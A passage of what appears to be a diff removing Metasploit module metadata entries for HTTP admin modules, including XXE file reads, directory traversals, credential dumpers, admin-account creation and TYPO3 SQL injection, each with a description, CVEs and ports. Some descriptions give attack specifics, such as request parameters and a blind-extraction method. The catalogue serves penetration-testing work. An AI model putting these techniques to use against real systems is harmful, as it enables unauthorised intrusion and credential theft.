Popovic ", - "Bojan Zdrnja " - ], - "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.", - "references": [ - "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/" - ], - "platform": "", - "arch": "", - "rport": 3780, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", - "is_install_path": true, - "ref_name": "admin/http/nexpose_xxe_file_read", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/novell_file_reporter_filedelete": { - "name": "Novell File Reporter Agent Arbitrary File Delete", - "fullname": "auxiliary/admin/http/novell_file_reporter_filedelete", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.", - "references": [ - "CVE-2011-2750", - "OSVDB-73729", - "URL-http://aluigi.org/adv/nfr_2-adv.txt" - ], - "platform": "", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", - "is_install_path": true, - "ref_name": "admin/http/novell_file_reporter_filedelete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/nuuo_nvrmini_reset": { - "name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset", - "fullname": "auxiliary/admin/http/nuuo_nvrmini_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-08-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.", - "references": [ - "CVE-2016-5676", - "US-CERT-VU-856152", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-nvr-vulns.txt", - "URL-https://seclists.org/bugtraq/2016/Aug/45" - ], - "platform": "", - "arch": "", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/nuuo_nvrmini_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/openbravo_xxe": { - "name": "Openbravo ERP XXE Arbitrary File Read", - "fullname": "auxiliary/admin/http/openbravo_xxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-30", - "type": "auxiliary", - "author": [ - "Brandon Perry " - ], - "description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.", - "references": [ - "CVE-2013-3617", - "OSVDB-99141", - "BID-63431", - "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", - "is_install_path": true, - "ref_name": "admin/http/openbravo_xxe", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/pfadmin_set_protected_alias": { - "name": "Postfixadmin Protected Alias Deletion Vulnerability", - "fullname": "auxiliary/admin/http/pfadmin_set_protected_alias", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-02-03", - "type": "auxiliary", - "author": [ - "Jan-Frederik Rieckers" - ], - "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias", - "references": [ - "CVE-2017-5930", - "URL-https://github.com/postfixadmin/postfixadmin/pull/23", - "BID-96142" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", - "is_install_path": true, - "ref_name": "admin/http/pfadmin_set_protected_alias", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/pihole_domains_api_exec": { - "name": "Pi-Hole Top Domains API Authenticated Exec", - "fullname": "auxiliary/admin/http/pihole_domains_api_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-08-04", - "type": "auxiliary", - "author": [ - "h00die", - "SchneiderSec" - ], - "description": "This exploits a command execution in Pi-Hole Web Interface <= 5.5.\n The Settings > API/Web inetrace page contains the field\n Top Domains/Top Advertisers which is validated by a regex which does not properly\n filter system commands, which can then be executed by calling the gravity\n functionality. However, the regex only allows a-z, 0-9, _.", - "references": [ - "URL-https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-5cm9-6p3m-v259", - "CVE-2021-32706" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/http/pihole_domains_api_exec.rb", - "is_install_path": true, - "ref_name": "admin/http/pihole_domains_api_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/rails_devise_pass_reset": { - "name": "Ruby on Rails Devise Authentication Password Reset", - "fullname": "auxiliary/admin/http/rails_devise_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-28", - "type": "auxiliary", - "author": [ - "joernchen", - "jjarmoc" - ], - "description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.", - "references": [ - "CVE-2013-0233", - "OSVDB-89642", - "BID-57577", - "URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/", - "URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html", - "URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8", - "URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", - "is_install_path": true, - "ref_name": "admin/http/rails_devise_pass_reset", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/scadabr_credential_dump": { - "name": "ScadaBR Credentials Dumper", - "fullname": "auxiliary/admin/http/scadabr_credential_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-28", - "type": "auxiliary", - "author": [ - "bcoles " - ], - "description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the `EmportDwr.createExportData` DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.", - "references": [], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2021-02-22 15:51:02 +0000", - "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", - "is_install_path": true, - "ref_name": "admin/http/scadabr_credential_dump", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/scrutinizer_add_user": { - "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass", - "fullname": "auxiliary/admin/http/scrutinizer_add_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-27", - "type": "auxiliary", - "author": [ - "MC ", - "Jonathan Claudius", - "Tanya Secker", - "sinn3r " - ], - "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.", - "references": [ - "CVE-2012-2626", - "OSVDB-84318", - "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", - "is_install_path": true, - "ref_name": "admin/http/scrutinizer_add_user", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sophos_wpa_traversal": { - "name": "Sophos Web Protection Appliance patience.cgi Directory Traversal", - "fullname": "auxiliary/admin/http/sophos_wpa_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-04-03", - "type": "auxiliary", - "author": [ - "Wolfgang Ettlingers", - "juan vazquez " - ], - "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.", - "references": [ - "CVE-2013-2641", - "OSVDB-91953", - "BID-58833", - "EDB-24932", - "URL-https://web.archive.org/web/20130603041204/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx", - "URL-https://web.archive.org/web/20140701204340/https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/sophos_wpa_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/supra_smart_cloud_tv_rfi": { - "name": "Supra Smart Cloud TV Remote File Inclusion", - "fullname": "auxiliary/admin/http/supra_smart_cloud_tv_rfi", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-06-03", - "type": "auxiliary", - "author": [ - "Dhiraj Mishra", - "wvu " - ], - "description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.", - "references": [ - "CVE-2019-12477", - "URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb", - "is_install_path": true, - "ref_name": "admin/http/supra_smart_cloud_tv_rfi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_admin_acct": { - "name": "SysAid Help Desk Administrator Account Creation", - "fullname": "auxiliary/admin/http/sysaid_admin_acct", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.", - "references": [ - "CVE-2015-2993", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_admin_acct", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_file_download": { - "name": "SysAid Help Desk Arbitrary File Download", - "fullname": "auxiliary/admin/http/sysaid_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.", - "references": [ - "CVE-2015-2996", - "CVE-2015-2997", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/sysaid_sql_creds": { - "name": "SysAid Help Desk Database Credentials Disclosure", - "fullname": "auxiliary/admin/http/sysaid_sql_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-06-03", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.", - "references": [ - "CVE-2015-2996", - "CVE-2015-2998", - "URL-https://seclists.org/fulldisclosure/2015/Jun/8", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb", - "is_install_path": true, - "ref_name": "admin/http/sysaid_sql_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/telpho10_credential_dump": { - "name": "Telpho10 Backup Credentials Dumper", - "fullname": "auxiliary/admin/http/telpho10_credential_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-09-02", - "type": "auxiliary", - "author": [ - "Jan Rude" - ], - "description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb", - "is_install_path": true, - "ref_name": "admin/http/telpho10_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_administration": { - "name": "Tomcat Administration Tool Default Access", - "fullname": "auxiliary/admin/http/tomcat_administration", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "Detect the Tomcat administration interface. The administration interface is included in versions 5.5 and lower.\n Port 8180 is the default for FreeBSD, 8080 for all others.", - "references": [ - "URL-http://tomcat.apache.org/" - ], - "platform": "", - "arch": "", - "rport": 8180, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_administration.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_administration", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_ghostcat": { - "name": "Apache Tomcat AJP File Read", - "fullname": "auxiliary/admin/http/tomcat_ghostcat", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-02-20", - "type": "auxiliary", - "author": [ - "A Security Researcher of Chaitin Tech", - "SunCSR Team" - ], - "description": "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache\n Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection.\n If such connections are available to an attacker, they can be exploited in ways that may be surprising.\n\n In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP\n Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended\n in the security guide) that this Connector would be disabled if not required. This vulnerability report\n identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application -\n processing any file in the web application as a JSP. Further, if the web application allowed file upload\n and stored those files within the web application (or the attacker was able to control the content of the\n web application by some other means) then this, along with the ability to process a file as a JSP, made\n remote code execution possible.\n\n It is important to note that mitigation is only required if an AJP port is accessible to untrusted users.\n Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files\n and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were\n made to the default AJP Connector configuration in 9.0.31 to harden the default configuration.\n It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes\n to their configurations.", - "references": [ - "CVE-2020-1938", - "EDB-48143", - "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat" - ], - "platform": "", - "arch": "", - "rport": 8009, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_ghostcat", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Ghostcat" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/tomcat_utf8_traversal": { - "name": "Tomcat UTF-8 Directory Traversal Vulnerability", - "fullname": "auxiliary/admin/http/tomcat_utf8_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-09", - "type": "auxiliary", - "author": [ - "aushack ", - "guerrino di massa" - ], - "description": "This module tests whether a directory traversal vulnerability is present\n in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.", - "references": [ - "URL-http://tomcat.apache.org/", - "OSVDB-47464", - "CVE-2008-2938", - "URL-http://www.securityfocus.com/archive/1/499926" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/tomcat_utf8_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/trendmicro_dlp_traversal": { - "name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal", - "fullname": "auxiliary/admin/http/trendmicro_dlp_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-09", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module tests whether a directory traversal vulnerability is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.", - "references": [ - "URL-http://tomcat.apache.org/", - "OSVDB-47464", - "OSVDB-73447", - "CVE-2008-2938", - "URL-http://www.securityfocus.com/archive/1/499926", - "EDB-17388", - "BID-48225" - ], - "platform": "", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", - "is_install_path": true, - "ref_name": "admin/http/trendmicro_dlp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_news_module_sqli": { - "name": "TYPO3 News Module SQL Injection", - "fullname": "auxiliary/admin/http/typo3_news_module_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-04-06", - "type": "auxiliary", - "author": [ - "Marco Rivoli", - "Charles Fol" - ], - "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)", - "references": [ - "CVE-2017-7581", - "URL-http://www.ambionics.io/blog/typo3-news-module-sqli" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_news_module_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_sa_2009_001": { - "name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2009_001", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-20", - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module exploits a flaw in TYPO3 encryption ey creation process to allow for\n file disclosure in the jumpUrl mechanism. This flaw can be used to read any file\n that the web server user account has access to view.", - "references": [ - "CVE-2009-0255", - "OSVDB-51536", - "URL-http://blog.c22.cc/advisories/typo3-sa-2009-001", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2009_001", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_sa_2009_002": { - "name": "Typo3 sa-2009-002 File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2009_002", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-10", - "type": "auxiliary", - "author": [ - "spinbad " - ], - "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.", - "references": [ - "OSVDB-52048", - "CVE-2009-0815", - "URL-http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/", - "EDB-8038", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2009_002", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/http/typo3_sa_2010_020": { - "name": "TYPO3 